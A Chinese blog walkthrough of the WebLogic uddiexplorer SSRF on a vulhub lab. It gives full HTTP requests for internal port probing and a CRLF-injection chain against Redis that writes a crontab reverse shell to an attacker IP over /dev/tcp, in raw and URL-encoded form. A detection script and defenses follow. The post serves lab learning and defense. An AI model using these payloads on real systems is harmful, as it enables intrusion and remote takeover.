Weblogic SSRF

已于 2024-05-16 10:21:52 修改
阅读量1k 收藏 11
点赞数 17
分类专栏: web安全 python武器库 文章标签: web安全
于 2024-05-15 13:39:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45653478/article/details/138905610
版权

1 SSRF漏洞概述

SSRF漏洞通常是由于服务端提供了从其他服务器应用获取数据的功能,并且没有对目标地址进行过滤与限制。攻击者可以利用这个漏洞,通过篡改获取资源的请求发送给服务器,服务器在没有发现这个请求是非法的情况下,会以自身的身份去访问其他服务器的资源。

2 Weblogic SSRF漏洞影响版本

Weblogic SSRF漏洞主要影响Weblogic 10.0.2和10.3.6版本。这些版本的Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

3 Weblogic SSRF漏洞形成原因

Weblogic SSRF漏洞形成的原因主要是由于服务端验证请求时没有对用户请求做出严格的过滤以及限制,导致其可以获取服务器的一定量的数据,并可以实现篡改获取的资源并请求发送给服务器。在Weblogic中,这个漏洞主要出现在uddi组件(具体为uddi包实现包uddiexplorer.war下的SearchPublicRegistries.jsp)。

4 vulhub靶场漏洞部署

进入漏洞文件
cd vulhub/weblogic/ssrf
部署漏洞环境
docker compose up -d
查看漏洞端口
docker compose ps

访问 ,您将看到页面,表示环境正在成功运行

5 漏洞复现

5.1 ssrf漏洞复现

SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp,我们在brupsuite下测试该漏洞。访问一个可以访问的IP:PORT,如http://127.0.0.1:80

GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1
Host: 192.168.135.132:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

可访问的端口将会得到错误,一般是返回status code(如下图),如果访问的非http协议,则会返回did not have a valid SOAP content-type

修改为一个不存在的端口,将会返回could not connect over HTTP to server

5.2 注入HTTP头,利用Redis反弹shell

Weblogic的SSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。

首先,通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*),

查看redis服务器
docker ps
docker exec -it 3457229db3d2 /bin/bash

发现172.18.0.2:6379可以连通

发送三条redis命令,将弹shell脚本写入/etc/crontab

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.135.130/4444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
aa

将这三条命令进行URL编码

%73%65%74%20%31%20%22%5c%6e%5c%6e%5c%6e%5c%6e%2a%20%2a%20%2a%20%2a%20%2a%20%72%6f%6f%74%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%33%35%2e%31%33%30%2f%34%34%34%34%20%30%3e%26%31%5c%6e%5c%6e%5c%6e%5c%6e%22%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%65%74%63%2f%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%63%72%6f%6e%74%61%62%0a%73%61%76%65%0a%61%61

将url编码后的字符串放在ssrf的域名后面,发送:

GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.18.0.2:6379/test%0D%0A%0D%0Aset%201%20%22\n\n\n\n*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.135.130%2F4444%200%3E%261\n\n\n\n%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aqwezxc HTTP/1.1
Host: 192.168.135.132:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

反弹成功

6 使用python脚本探测漏洞

#!/usr/bin/env python

import requests
from urllib.parse import urljoin

def ssrf(url):
    payload = urljoin(url, '/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001')

    try:
        response = requests.get(url=payload, verify=False, timeout=10)
        print(response.text)
        if 'deployed without error' in response.text:
            print("漏洞存在")
        else:
            print("漏洞不存在")
    except requests.exceptions.RequestException as e:
        print("请求错误:", e)

if __name__ == '__main__':
    print("注意:本代码仅用于实验和学习目的,请谨慎使用。")
    url = input("请输入目标 URL: ")
    ssrf(url)

7 Weblogic SSRF漏洞防范措施

  1. 严格过滤和验证用户输入:对于用户输入的URL地址或其他可能包含攻击代码的数据进行严格过滤和验证,防止攻击者利用SSRF漏洞发送恶意请求。

  2. 限制访问目标地址:在服务端配置中限制访问的目标地址范围,只允许访问指定的白名单地址,防止攻击者利用SSRF漏洞访问内网中其他服务器。

  3. 及时更新和修补漏洞:定期更新Weblogic版本并修补已知的安全漏洞,防止攻击者利用已知漏洞进行攻击。

  4. 部署安全设备:在网络中部署防火墙、入侵检测系统等安全设备,及时发现和阻止SSRF等攻击行为。

乐队1
关注
  • 17
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
WebLogic SSRF And XSS检查利用工具.exe
08-11
非常简单方便/实用的WebLogic SSRF And XSS检查利用工具
Weblogic SSRF漏洞
热门推荐
chaojixiaojingang
01-14 1万+
1.漏洞描述 weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 2.影响版本 weblogic 10.0.2 – 10.3.6版本 3.POC http://192.168.42.145:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSear...
Weblogic SSRF漏洞复现
huangyongkang666的博客
07-22 1210
Weblogic SSRF漏洞复现
SSRC】Weblogic SSRF漏洞
wj33333的博客
11-17 291
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。WeblogicSSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入。首先,通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*),可访问的端口将会得到错误,一般是返回status code(如下图)。
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
Weblogic漏洞扫描工具
02-22
本篇将详细探讨"Weblogic漏洞扫描工具"的相关知识点,包括Weblogic的漏洞类型、反序列化攻击、SSRF漏洞以及如何进行有效的漏洞扫描。 首先,我们要理解Weblogic的`console页面探测`。Weblogic Console是Weblogic...
JavaCodeAudit:Java代码审核入门代码审核入门的小项目
01-30
审计环境简介SQL漏洞原理和实际案例介绍XSS漏洞原理和实际案例介绍SSRF漏洞原理和实际案例介绍RCE漏洞原理和实际案例介绍包括漏洞原理和实际案例介绍序列化漏洞原理和实际案例介绍S2系列经典漏洞分析WebLogic系列...
如何用IP地址申请SSL证书实现网络安全
2401_84891336的博客
07-10 404
申请IP地址SSL证书
网络安全防御【防火墙NAT智能选举综合实验】
miss_copper的博客
07-13 928
需要新创建一个源地址转池:这里我们将配置黑洞路由勾选(防止路由环路,还可以引入到OSPF等动态路由协议中发布出去),允许端口地址转换取消勾选(因为我们这里是多对多的NAT,源NAT地址转换,如果勾选了端口地址转换,就成了端口映射,成了目标NAT)这种方式可以提高安全性,因为攻击者无法预测目标设备的确切IP地址。首先修改公网client5,和分公司server5和client6的域名服务器地址,并且公网中的server4(NDS服务器)开启DNS服务,和分公司的server5开启http服务器。
网络安全防御【防火墙安全策略用户认证综合实验】
miss_copper的博客
07-10 1236
先新建一个管理员角色(网络安全管理员):再新建一个管理员(用户名密码自拟):至此本实验全部结束!!!
7.13实训日志
最新发布
Kidding_Ma的博客
07-13 160
作为一名大学生,我深感有责任在今后的学习和职业生涯中,为推动网络安全技术的发展和应用做出贡献,保障数字化社会的安全和稳定发展。在技术方面,我们学习了多种编程语言和工具的应用,如Python用于爬虫和脚本、Java用于代码审计和漏洞挖掘、C语言用于二进制漏洞挖掘等。会上,专家学者们分享了关于网络安全最新的研究成果和技术应用,以及面临的挑战和未来的发展方向,给我留下了深刻的印象和启发。学习网络安全的过程中,我们深入了解了网络的不同层面和技术,从表层网络到深网再到暗网,以及涉及的产业分类和技术工具。
网络安全法视角下的等保测评法律责任与风险控制
ddcajdkdl的博客
07-11 418
直接责任人员处罚:对于违反网络安全法规定,导致严重后果的,不仅单位要承担责任,直接负责的主管人员和其他直接责任人员也可能被处以罚款,甚至追究刑事责任。该法于2017年6月1日正式实施,其中对网络安全等级保护制度(简称“等保”)做出了明确规定,要求网络运营者根据其网络的重要程度及潜在影响,实施相应级别的安全保护措施。综上所述,从《网络安全法》的角度出发,等保测评不仅是法律规定的强制性要求,也是企业自我保护、规避法律风险、维护信誉和业务连续性的关键措施。
网络安全——防御实验
Nirvana92的博客
07-09 1084
# 防御实验一 ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/63794e616c244387a03fae34450d6f00.png) #### 拓扑结构展示: ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/eb297641443c4f78b6c93c432e2b5286.png) ## 一、 ### 根据题目,先为办公区做**安全策略**主要策略有以下几点: 1、书写名称和描述,名称和描述要**明确**,让除本人
网络安全合规建设
weixin_68864415的博客
07-09 905
简单介绍了企业网络安全合规的问题
【网络安全科普】网络安全指南请查收
weixin_45840241的博客
07-09 884
网络安全为人民、网络安全靠人民,维护网络安全是全社会共同的责任,需要政府、企业、社会组织、广大网民共同参与,共筑网络安全防线。但与此同时,互联网领域的问题也日益凸显。网络安全,是指通过采取必要措施,防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故,使网络处于稳定可靠运行的状态,以及保障网络数据的完整性、保密性、可用性、真实性和可控性的能力。所有刷单都是诈骗,做任务赚佣金不过是刷单诈骗的诱饵,切勿相信“免费送、轻松赚”等兼职广告,不要贪图小便宜,不要轻易点击陌生链接或扫描陌生二维码下载APP。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-04 2033
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
weblogic ssrf
05-17
WebLogic SSRF (Server Side Request Forgery) 是一种攻击技术,攻击者通过构造恶意请求,让目标服务器向其它服务器发起请求,从而获取目标服务器无法访问的资源或执行恶意操作。WebLogic SSRF攻击主要利用WebLogic...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值